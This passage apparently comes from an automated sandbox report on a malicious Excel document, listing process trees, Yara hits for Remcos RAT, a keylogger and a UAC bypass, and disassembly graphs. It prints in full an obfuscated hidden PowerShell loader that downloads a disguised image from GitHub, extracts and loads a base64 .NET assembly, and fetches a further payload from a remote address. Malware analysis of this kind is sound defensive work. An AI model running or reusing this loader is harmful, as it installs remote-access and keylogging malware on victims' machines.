                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:31
                                                                                                                                                                              Start time:05:06:24
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                              Imagebase:0xd90000
                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.509094010.0000000000551000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Disassembly

                                                                                                                                                                              Code Analysis

                                                                                                                                                                              Call Graph

                                                                                                                                                                              • Entrypoint
                                                                                                                                                                              • Decryption Function
                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              • Show Help
                                                                                                                                                                              callgraph 1 Error: Graph is empty

                                                                                                                                                                              Module: Sheet1

                                                                                                                                                                              Declaration
                                                                                                                                                                              LineContent
                                                                                                                                                                              1

                                                                                                                                                                              Attribute VB_Name = "Sheet1"

                                                                                                                                                                              2

                                                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                              3

                                                                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                                                                              4

                                                                                                                                                                              Attribute VB_Creatable = False

                                                                                                                                                                              5

                                                                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                                                                              6

                                                                                                                                                                              Attribute VB_Exposed = True

                                                                                                                                                                              7

                                                                                                                                                                              Attribute VB_TemplateDerived = False

                                                                                                                                                                              8

                                                                                                                                                                              Attribute VB_Customizable = True

                                                                                                                                                                              Module: Sheet2

                                                                                                                                                                              Declaration
                                                                                                                                                                              LineContent
                                                                                                                                                                              1

                                                                                                                                                                              Attribute VB_Name = "Sheet2"

                                                                                                                                                                              2

                                                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                              3

                                                                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                                                                              4

                                                                                                                                                                              Attribute VB_Creatable = False

                                                                                                                                                                              5

                                                                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                                                                              6

                                                                                                                                                                              Attribute VB_Exposed = True

                                                                                                                                                                              7

                                                                                                                                                                              Attribute VB_TemplateDerived = False

                                                                                                                                                                              8

                                                                                                                                                                              Attribute VB_Customizable = True

                                                                                                                                                                              Module: Sheet3

                                                                                                                                                                              Declaration
                                                                                                                                                                              LineContent
                                                                                                                                                                              1

                                                                                                                                                                              Attribute VB_Name = "Sheet3"

                                                                                                                                                                              2

                                                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                              3

                                                                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                                                                              4

                                                                                                                                                                              Attribute VB_Creatable = False

                                                                                                                                                                              5

                                                                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                                                                              6

                                                                                                                                                                              Attribute VB_Exposed = True

                                                                                                                                                                              7

                                                                                                                                                                              Attribute VB_TemplateDerived = False

                                                                                                                                                                              8

                                                                                                                                                                              Attribute VB_Customizable = True

                                                                                                                                                                              Module: ThisWorkbook

                                                                                                                                                                              Declaration
                                                                                                                                                                              LineContent
                                                                                                                                                                              1

                                                                                                                                                                              Attribute VB_Name = "ThisWorkbook"

                                                                                                                                                                              2

                                                                                                                                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                                              3

                                                                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                                                                              4

                                                                                                                                                                              Attribute VB_Creatable = False

                                                                                                                                                                              5

                                                                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                                                                              6

                                                                                                                                                                              Attribute VB_Exposed = True

                                                                                                                                                                              7

                                                                                                                                                                              Attribute VB_TemplateDerived = False

                                                                                                                                                                              8

                                                                                                                                                                              Attribute VB_Customizable = True

                                                                                                                                                                              Reset < >

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 02920FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000003.427841120.0000000002920000.00000010.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_3_2920000_mshta.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                • Instruction ID: c4716784dfd662206c076e8d1dab569b69fb71c1c264b4c67e3a53f6b3e38811
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                Function 02920FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000003.427841120.0000000002920000.00000010.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_3_2920000_mshta.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                • Instruction ID: c4716784dfd662206c076e8d1dab569b69fb71c1c264b4c67e3a53f6b3e38811
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                Function 02920FA9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000003.427841120.0000000002920000.00000010.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_3_2920000_mshta.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                • Instruction ID: c4716784dfd662206c076e8d1dab569b69fb71c1c264b4c67e3a53f6b3e38811
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                Function 02920FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000003.427841120.0000000002920000.00000010.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_3_2920000_mshta.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                • Instruction ID: c4716784dfd662206c076e8d1dab569b69fb71c1c264b4c67e3a53f6b3e38811
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                • Instruction Fuzzy Hash:

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:3.8%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:50%
                                                                                                                                                                                Total number of Nodes:6
                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                execution_graph 2648 7fe899b4ab5 2649 7fe899b4ac1 URLDownloadToFileW 2648->2649 2651 7fe899b5b00 2649->2651 2640 7fe899b59e1 2641 7fe899b59f1 URLDownloadToFileW 2640->2641 2643 7fe899b5b00 2641->2643

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 000007FE899B4AB5 Relevance: 1.7, APIs: 1, Instructions: 155COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 142 7fe899b4ab5-7fe899b4abf 143 7fe899b4b01-7fe899b5aa1 142->143 144 7fe899b4ac1-7fe899b4ad5 142->144 148 7fe899b5aab-7fe899b5ab1 143->148 149 7fe899b5aa3-7fe899b5aa8 143->149 144->143 150 7fe899b5abb-7fe899b5afe URLDownloadToFileW 148->150 151 7fe899b5ab3-7fe899b5ab8 148->151 149->148 152 7fe899b5b06-7fe899b5b23 150->152 153 7fe899b5b00 150->153 151->150 153->152
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.459710178.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 63e6f3d9f6cdb99b28ced783df5c6c1d26113f699d22d59d7297854860be396d
                                                                                                                                                                                • Instruction ID: e4d46c5b68b7e8eacdd1d90594ab6e024db077ebece774c9529a0acc32575742
                                                                                                                                                                                • Opcode Fuzzy Hash: 63e6f3d9f6cdb99b28ced783df5c6c1d26113f699d22d59d7297854860be396d
                                                                                                                                                                                • Instruction Fuzzy Hash: 0941E23190CB984FD719DB589C897E9BBF0FB55310F0482AFD04DD7162CA74A806CB92
                                                                                                                                                                                Function 000007FE89A80858 Relevance: 11.1, Strings: 8, Instructions: 1110COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 7fe89a80858-7fe89a80903 1 7fe89a80909-7fe89a80913 0->1 2 7fe89a80f0d-7fe89a80f96 0->2 3 7fe89a8092d-7fe89a8093f 1->3 4 7fe89a80915-7fe89a80923 1->4 10 7fe89a81098-7fe89a810dc 2->10 11 7fe89a80f9c-7fe89a80fa6 2->11 3->2 6 7fe89a80945-7fe89a8094f 3->6 4->3 5 7fe89a80925-7fe89a8092b 4->5 5->3 8 7fe89a80968-7fe89a8097a 6->8 9 7fe89a80951-7fe89a8095e 6->9 8->2 16 7fe89a80980-7fe89a8098a 8->16 9->8 15 7fe89a80960-7fe89a80966 9->15 29 7fe89a810ed-7fe89a81124 10->29 30 7fe89a810de-7fe89a810e7 10->30 12 7fe89a80fa8-7fe89a80fb5 11->12 13 7fe89a80fbf-7fe89a80fee 11->13 12->13 17 7fe89a80fb7-7fe89a80fbd 12->17 13->10 37 7fe89a80ff4-7fe89a80ffe 13->37 15->8 19 7fe89a8098c-7fe89a8099a 16->19 20 7fe89a809a4-7fe89a809b6 16->20 17->13 19->20 21 7fe89a8099c-7fe89a809a2 19->21 20->2 22 7fe89a809bc-7fe89a809c6 20->22 21->20 27 7fe89a809c8-7fe89a809d5 22->27 28 7fe89a809df-7fe89a809f9 22->28 27->28 32 7fe89a809d7-7fe89a809dd 27->32 28->2 34 7fe89a809ff-7fe89a80a09 28->34 35 7fe89a8112a-7fe89a81190 29->35 36 7fe89a811c1-7fe89a811cb 29->36 30->29 32->28 40 7fe89a80a0b-7fe89a80a18 34->40 41 7fe89a80a22-7fe89a80a39 34->41 72 7fe89a8119a-7fe89a8119e 35->72 38 7fe89a811d8-7fe89a811e8 36->38 39 7fe89a811cd-7fe89a811d7 36->39 45 7fe89a81017-7fe89a81077 37->45 46 7fe89a81000-7fe89a8100d 37->46 47 7fe89a811ea-7fe89a811ee 38->47 48 7fe89a811f5-7fe89a8121a 38->48 40->41 49 7fe89a80a1a-7fe89a80a20 40->49 41->2 42 7fe89a80a3f-7fe89a80a49 41->42 50 7fe89a80a4b-7fe89a80a58 42->50 51 7fe89a80a65-7fe89a80a79 42->51 67 7fe89a81079-7fe89a81084 45->67 68 7fe89a8108b-7fe89a81097 45->68 46->45 52 7fe89a8100f-7fe89a81015 46->52 47->48 49->41 50->51 54 7fe89a80a5a-7fe89a80a63 50->54 51->2 56 7fe89a80a7f-7fe89a80a89 51->56 52->45 54->51 59 7fe89a80aa8-7fe89a80abc 56->59 60 7fe89a80a8b-7fe89a80a98 56->60 59->2 66 7fe89a80ac2-7fe89a80acc 59->66 60->59 65 7fe89a80a9a-7fe89a80aa6 60->65 65->59 69 7fe89a80aee-7fe89a80b02 66->69 70 7fe89a80ace-7fe89a80adb 66->70 67->68 69->2 71 7fe89a80b08-7fe89a80b12 69->71 70->69 74 7fe89a80add-7fe89a80aec 70->74 75 7fe89a80b34-7fe89a80b48 71->75 76 7fe89a80b14-7fe89a80b21 71->76 80 7fe89a811a6-7fe89a811be 72->80 74->69 75->2 79 7fe89a80b4e-7fe89a80b59 75->79 76->75 78 7fe89a80b23-7fe89a80b32 76->78 78->75 81 7fe89a80b5b-7fe89a80b88 79->81 82 7fe89a80ba0-7fe89a80bb1 79->82 81->82 84 7fe89a80b8a-7fe89a80b9e 81->84 82->2 85 7fe89a80bb7-7fe89a80bc1 82->85 84->82 86 7fe89a80bc3-7fe89a80bf0 85->86 87 7fe89a80c05-7fe89a80c4f 85->87 86->87 88 7fe89a80bf2-7fe89a80c03 86->88 87->2 93 7fe89a80c55-7fe89a80c5f 87->93 88->87 94 7fe89a80c7b-7fe89a80cdd 93->94 95 7fe89a80c61-7fe89a80c71 93->95 94->2 100 7fe89a80ce3-7fe89a80ced 94->100 95->94 96 7fe89a80c73-7fe89a80c74 95->96 96->94 101 7fe89a80d09-7fe89a80d4a 100->101 102 7fe89a80cef-7fe89a80cff 100->102 101->2 106 7fe89a80d50-7fe89a80d5a 101->106 102->101 103 7fe89a80d01-7fe89a80d02 102->103 103->101 107 7fe89a80d76-7fe89a80dda 106->107 108 7fe89a80d5c-7fe89a80d6c 106->108 107->2 113 7fe89a80de0-7fe89a80ded 107->113 108->107 109 7fe89a80d6e-7fe89a80d6f 108->109 109->107 114 7fe89a80e09-7fe89a80e70 113->114 115 7fe89a80def-7fe89a80dff 113->115 114->2 120 7fe89a80e76-7fe89a80e83 114->120 115->114 116 7fe89a80e01-7fe89a80e02 115->116 116->114 121 7fe89a80e9f-7fe89a80f0a 120->121 122 7fe89a80e85-7fe89a80e95 120->122 122->121 123 7fe89a80e97-7fe89a80e98 122->123 123->121
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.459782866.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 88M$88M$88M$88M$8hT$8hT$8hT$8hT
                                                                                                                                                                                • API String ID: 0-1541320209
                                                                                                                                                                                • Opcode ID: 1f83f2931ab0565ea96a4336c1d5ab34f20685f04ff56a8cb9dc89b52b61a62c
                                                                                                                                                                                • Instruction ID: e0fa3f7919cc77ee6602d2490e7392910e47c11ccf0e5ebcce71af8ca074e034
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f83f2931ab0565ea96a4336c1d5ab34f20685f04ff56a8cb9dc89b52b61a62c
                                                                                                                                                                                • Instruction Fuzzy Hash: 86720730A1CB854FDB59EB2C8894A757BE1EF56340F1841EED48ED72A3DA24EC45C781
                                                                                                                                                                                Function 000007FE899B59E1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 126 7fe899b59e1-7fe899b59ef 127 7fe899b59f2-7fe899b5a05 126->127 128 7fe899b59f1 126->128 129 7fe899b5a07 127->129 130 7fe899b5a08-7fe899b5a19 127->130 128->127 129->130 131 7fe899b5a1b 130->131 132 7fe899b5a1c-7fe899b5aa1 130->132 131->132 136 7fe899b5aab-7fe899b5ab1 132->136 137 7fe899b5aa3-7fe899b5aa8 132->137 138 7fe899b5abb-7fe899b5afe URLDownloadToFileW 136->138 139 7fe899b5ab3-7fe899b5ab8 136->139 137->136 140 7fe899b5b06-7fe899b5b23 138->140 141 7fe899b5b00 138->141 139->138 141->140
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.459710178.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DownloadFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1407266417-0
                                                                                                                                                                                • Opcode ID: eccb5d4efdd9d821339d51415183fc3a6ca4cb2d8cb12961b40f8134c3fb33e0
                                                                                                                                                                                • Instruction ID: 777315a8379273862214977f4159bba84b37a095e6150f6c079ad4062ad424ff
                                                                                                                                                                                • Opcode Fuzzy Hash: eccb5d4efdd9d821339d51415183fc3a6ca4cb2d8cb12961b40f8134c3fb33e0
                                                                                                                                                                                • Instruction Fuzzy Hash: BB41F37181DB989FDB19EB589C447A9BBF0FB56321F04826FD08DD3162CB286806C782
                                                                                                                                                                                Function 000007FE899B4AFC Relevance: 1.6, APIs: 1, Instructions: 143filenetworkCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 154 7fe899b4afc-7fe899b5aa1 159 7fe899b5aab-7fe899b5ab1 154->159 160 7fe899b5aa3-7fe899b5aa8 154->160 161 7fe899b5abb-7fe899b5afe URLDownloadToFileW 159->161 162 7fe899b5ab3-7fe899b5ab8 159->162 160->159 163 7fe899b5b06-7fe899b5b23 161->163 164 7fe899b5b00 161->164 162->161 164->163
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.459710178.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DownloadFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1407266417-0
                                                                                                                                                                                • Opcode ID: d98df72395ff977c5e09bb1534dfc30c7abc4c4684f75e9b01a871e9f943f9ed
                                                                                                                                                                                • Instruction ID: 71d44ac0b58f89976c3b3d06f41d2ef85568ee3998077458df01ad303f9f7a1e
                                                                                                                                                                                • Opcode Fuzzy Hash: d98df72395ff977c5e09bb1534dfc30c7abc4c4684f75e9b01a871e9f943f9ed
                                                                                                                                                                                • Instruction Fuzzy Hash: 5441A13190CB9C4FDB19DB5898857A9BBF0FB59320F04826FD04DD3162DB74A846CB92
                                                                                                                                                                                Function 000007FE89A81100 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 165 7fe89a81100-7fe89a81124 167 7fe89a8112a-7fe89a8119e 165->167 168 7fe89a811c1-7fe89a811cb 165->168 178 7fe89a811a6-7fe89a811be 167->178 169 7fe89a811d8-7fe89a811e8 168->169 170 7fe89a811cd-7fe89a811d7 168->170 172 7fe89a811ea-7fe89a811ee 169->172 173 7fe89a811f5-7fe89a8121a 169->173 172->173
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.459782866.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8hT
                                                                                                                                                                                • API String ID: 0-3237309121
                                                                                                                                                                                • Opcode ID: 6ccfa9d6ddf2b25bdae726e0d9ca0561762f4374cfd27ae0fc164becdf1629de
                                                                                                                                                                                • Instruction ID: b49126e815d93afd3a545300eb52200b589bb1d431efac254077fa38fdcafbe1
                                                                                                                                                                                • Opcode Fuzzy Hash: 6ccfa9d6ddf2b25bdae726e0d9ca0561762f4374cfd27ae0fc164becdf1629de
                                                                                                                                                                                • Instruction Fuzzy Hash: 8721BC0060D7CA1FE347937C1950265BFD2DF8B658B2910EBD58ED71A3D9454C6AC361
                                                                                                                                                                                Function 000007FE89A82CD9 Relevance: .7, Instructions: 705COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 179 7fe89a82cd9-7fe89a82d89 180 7fe89a8326d-7fe89a83326 179->180 181 7fe89a82d8f-7fe89a82d99 179->181 182 7fe89a82d9b-7fe89a82da8 181->182 183 7fe89a82db2-7fe89a82db9 181->183 182->183 185 7fe89a82daa-7fe89a82db0 182->185 186 7fe89a82dbb-7fe89a82dce 183->186 187 7fe89a82dd0 183->187 185->183 188 7fe89a82dd2-7fe89a82dd4 186->188 187->188 189 7fe89a831e8-7fe89a831f2 188->189 190 7fe89a82dda-7fe89a82de6 188->190 194 7fe89a83205-7fe89a83215 189->194 195 7fe89a831f4-7fe89a83204 189->195 190->180 193 7fe89a82dec-7fe89a82df6 190->193 196 7fe89a82df8-7fe89a82e05 193->196 197 7fe89a82e12-7fe89a82e22 193->197 199 7fe89a83217-7fe89a8321b 194->199 200 7fe89a83222-7fe89a8326c 194->200 196->197 201 7fe89a82e07-7fe89a82e10 196->201 197->189 206 7fe89a82e28-7fe89a82e5c 197->206 199->200 201->197 206->189 211 7fe89a82e62-7fe89a82e6e 206->211 211->180 212 7fe89a82e74-7fe89a82e7e 211->212 213 7fe89a82e97-7fe89a82e9c 212->213 214 7fe89a82e80-7fe89a82e8d 212->214 213->189 216 7fe89a82ea2-7fe89a82ea7 213->216 214->213 215 7fe89a82e8f-7fe89a82e95 214->215 215->213 216->189 217 7fe89a82ead-7fe89a82eb2 216->217 217->189 219 7fe89a82eb8-7fe89a82ec7 217->219 220 7fe89a82ed7 219->220 221 7fe89a82ec9-7fe89a82ed3 219->221 224 7fe89a82edc-7fe89a82ee9 220->224 222 7fe89a82ef3-7fe89a82f7e 221->222 223 7fe89a82ed5 221->223 231 7fe89a82f80-7fe89a82f8b 222->231 232 7fe89a82f92-7fe89a82fb4 222->232 223->224 224->222 226 7fe89a82eeb-7fe89a82ef1 224->226 226->222 231->232 233 7fe89a82fb6-7fe89a82fc0 232->233 234 7fe89a82fc4 232->234 235 7fe89a82fe0-7fe89a8306e 233->235 236 7fe89a82fc2 233->236 237 7fe89a82fc9-7fe89a82fd6 234->237 244 7fe89a83070-7fe89a8307b 235->244 245 7fe89a83082-7fe89a830a0 235->245 236->237 237->235 238 7fe89a82fd8-7fe89a82fde 237->238 238->235 244->245 246 7fe89a830b0 245->246 247 7fe89a830a2-7fe89a830ac 245->247 250 7fe89a830b5-7fe89a830c3 246->250 248 7fe89a830cd-7fe89a8315d 247->248 249 7fe89a830ae 247->249 257 7fe89a8315f-7fe89a8316a 248->257 258 7fe89a83171-7fe89a831ca 248->258 249->250 250->248 251 7fe89a830c5-7fe89a830cb 250->251 251->248 257->258 261 7fe89a831d2-7fe89a831e7 258->261
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.459782866.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 398b876c7e50061e0ecbd5779dc0b2728796dd758746ff4f75235fa64512da67
                                                                                                                                                                                • Instruction ID: 36af2df8b3723615df37d14196fa03d76aeed2313c62f70f0c4a3b4b8c8c0205
                                                                                                                                                                                • Opcode Fuzzy Hash: 398b876c7e50061e0ecbd5779dc0b2728796dd758746ff4f75235fa64512da67
